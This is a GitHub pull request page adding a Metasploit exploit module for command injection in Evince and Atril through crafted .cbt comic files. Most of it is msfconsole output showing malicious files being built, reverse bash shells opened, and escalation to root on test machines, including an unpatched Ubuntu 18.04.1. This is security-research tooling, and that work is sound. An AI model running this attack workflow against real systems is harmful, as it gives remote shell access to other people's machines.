New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Evince CBT File Command Injection module #11349

Merged
merged 3 commits into from Feb 6, 2019

Conversation

Projects
None yet
2 participants
@bcoles
Copy link
Contributor

bcoles commented Feb 3, 2019

Add Evince CBT File Command Injection module.

    This module exploits a command injection vulnerability in Evince
    before version 3.24.1 when opening comic book `.cbt` files.

    Some file manager software, such as Nautilus and Atril, may allow
    automatic exploitation without user interaction due to thumbnailer
    preview functionality.

    Note that limited space is available for the payload (<256 bytes).
    Reverse Bash and Reverse Netcat payloads should be sufficiently small.

    This module has been tested successfully on evince versions:

    3.4.0-3.1 + nautilus 3.4.2-1+build1 on Kali 1.0.6;
    3.18.2-1ubuntu4.3 + atril 1.12.2-1ubuntu0.3 on Ubuntu 16.04.

Output

msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run

[*] Writing file: msf.cbt (1078272 bytes) ...
[+] msf.cbt stored at /root/.msf4/local/msf.cbt
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
[*] exec: mv /root/.msf4/local/msf.cbt /var/www

msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler 
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/handler) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.188:4444 
[*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.160:39362) at 2019-02-03 00:16:59 -0500

id
uid=1000(test) gid=1000(test) groups=1000(test),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
uname -a
Linux ubuntu-16-04-x64 4.4.0-140-generic #166-Ubuntu SMP Wed Nov 14 20:09:47 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

@bcoles bcoles added module docs labels Feb 3, 2019

@pbarry-r7 pbarry-r7 self-assigned this Feb 6, 2019

@pbarry-r7

This comment has been minimized.

Copy link
Contributor

pbarry-r7 commented Feb 6, 2019

Work fine for me using Kali 1.0.6 as a target:

msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 192.168.56.99
lhost => 192.168.56.99
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run

[*] Writing file: msf.cbt (1090048 bytes) ...
[+] msf.cbt stored at /home/vagrant/.msf4/local/msf.cbt
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf5 exploit(multi/handler) > set lhost 192.168.56.99
lhost => 192.168.56.99
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.56.99:4444 
[*] Command shell session 1 opened (192.168.56.99:4444 -> 192.168.56.102:45446) at 2019-02-06 21:26:34 +0000

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/root

Will land here shortly. Thx, @bcoles!

@pbarry-r7 pbarry-r7 merged commit 6f31b1a into rapid7:master Feb 6, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

pbarry-r7 added a commit that referenced this pull request Feb 6, 2019

msjenkins-r7 added a commit that referenced this pull request Feb 6, 2019

@bcoles bcoles deleted the bcoles:evince_cbt_cmd_injection branch Feb 7, 2019

@pbarry-r7

This comment has been minimized.

Copy link
Contributor

pbarry-r7 commented Feb 7, 2019

Release Notes

This adds the exploits/multi/fileformat/evince_cbt_cmd_injection module to framework, targeting vulnerable versions of Evince (a document viewer application) for command injection. Users can select this module to create a "comic book" .cbt file, containing a small payload, which will execute when the .cbt file is opened with Evince.

@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Feb 9, 2019

It's worth noting that the atril package is vulnerable and exploitable. By default atril is not installed on Ubuntu Desktop.

At time of writing, this vulnerability is still exploitable with atril on a fully up-to-date Ubuntu 18.04.1 system.

# ./msfconsole 
[-] ***rting The Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  

   _______________                        |*\_/*|________
  |  ___________  |     .-.     .-.      ||_/-\_|______  |
  | |           | |    .****. .****.     | |           | |
  | |   0   0   | |    .*****.*****.     | |   0   0   | |
  | |     -     | |     .*********.      | |     -     | |
  | |   \___/   | |      .*******.       | |   \___/   | |
  | |___     ___| |       .*****.        | |___________| |
  |_____|\_/|_____|        .***.         |_______________|
    _|__|/ \|_|_.............*.............._|________|_
   / ********** \                          / ********** \
 /  ************  \                      /  ************  \
--------------------                    -------------------


       =[ metasploit v5.0.6-dev-3387c53                   ]
+ -- --=[ 1874 exploits - 1057 auxiliary - 327 post       ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > use exploit/multi/fileformat/evince_cbt_cmd_injection 
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > set lhost 172.16.191.188
lhost => 172.16.191.188
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > run

[*] Writing file: msf.cbt (1048064 bytes) ...
[+] msf.cbt stored at /root/.msf4/local/msf.cbt
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > handler -p cmd/unix/reverse_bash -H 172.16.191.188 -P 4444 
[*] Payload handler running as background job 0.

[*] Started reverse TCP handler on 172.16.191.188:4444 
msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > mv /root/.msf4/local/msf.cbt /var/www
[*] exec: mv /root/.msf4/local/msf.cbt /var/www

msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > [*] Command shell session 1 opened (172.16.191.188:4444 -> 172.16.191.166:50604) at 2019-02-08 21:36:25 -0500

msf5 exploit(multi/fileformat/evince_cbt_cmd_injection) > sessions -i 1
[*] Starting interaction with 1...

cat /etc/issue
Ubuntu 18.04.1 LTS \n \l

evince --version
GNOME Document Viewer 3.28.4
atril --version
MATE Document Viewer 1.20.1
apt show atril

WARNING: apt does not have a stable CLI interface. Use with caution in scripts.

Package: atril
Version: 1.20.1-2ubuntu2
Priority: optional
Section: universe/x11
Origin: Ubuntu
Maintainer: Ubuntu Developers <ubuntu-devel-discuss@lists.ubuntu.com>
Original-Maintainer: Debian+Ubuntu MATE Packaging Team <debian-mate@lists.debian.org>
Bugs: https://bugs.launchpad.net/ubuntu/+filebug
Installed-Size: 676 kB
Provides: djvu-viewer, pdf-viewer, postscript-viewer
Depends: atril-common (>= 1.20.1-2ubuntu2), libatrildocument3 (= 1.20.1-2ubuntu2), libatrilview3 (= 1.20.1-2ubuntu2), mate-desktop-common, shared-mime-info, dconf-gsettings-backend | gsettings-backend, libatk1.0-0 (>= 1.12.4), libc6 (>= 2.4), libcaja-extension1 (>= 1.6.3), libgdk-pixbuf2.0-0 (>= 2.22.0), libglib2.0-0 (>= 2.37.3), libgtk-3-0 (>= 3.21.4), libice6 (>= 1:1.0.0), libsecret-1-0 (>= 0.7), libsm6, libxml2 (>= 2.7.4)
Recommends: default-dbus-session-bus | dbus-session-bus, gvfs
Suggests: caja, poppler-data, unrar
Breaks: libatrildocument3 (<< 1.13.0)
Replaces: libatrildocument3 (<< 1.13.0)
Homepage: http://www.mate-desktop.org/
Task: xubuntu-desktop, ubuntukylin-desktop, ubuntu-mate-core, ubuntu-mate-desktop
Supported: 3y
Download-Size: 177 kB
APT-Manual-Installed: yes
APT-Sources: http://au.archive.ubuntu.com/ubuntu bionic/universe amd64 Packages
Description: MATE document viewer
 Atril is a simple multi-page document viewer.  It can display and print
 PostScript (PS), Encapsulated PostScript (EPS), DJVU, DVI and Portable
 Document Format (PDF) files.
 .
 When supported by the document, it also allows searching for text, copying
 text to the clipboard, hypertext navigation, and table-of-contents
 bookmarks.


python3 -c 'import pty; pty.spawn("/bin/sh")'   
$ sudo /bin/bash
sudo /bin/bash
[sudo] password for user: password

root@ubuntu-18-1-x64:~# apt-get update && apt-get dist-upgrade
apt-get update && apt-get dist-upgrade
Hit:1 http://au.archive.ubuntu.com/ubuntu bionic InRelease
Hit:2 http://au.archive.ubuntu.com/ubuntu bionic-updates InRelease             
Hit:3 http://au.archive.ubuntu.com/ubuntu bionic-backports InRelease           
Get:4 http://security.ubuntu.com/ubuntu bionic-security InRelease [88.7 kB]    
Fetched 88.7 kB in 5s (17.2 kB/s)   
Reading package lists... Done
Reading package lists... Done
Building dependency tree       
Reading state information... Done
Calculating upgrade... Done
0 to upgrade, 0 to newly install, 0 to remove and 0 not to upgrade.
root@ubuntu-18-1-x64:~# 
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment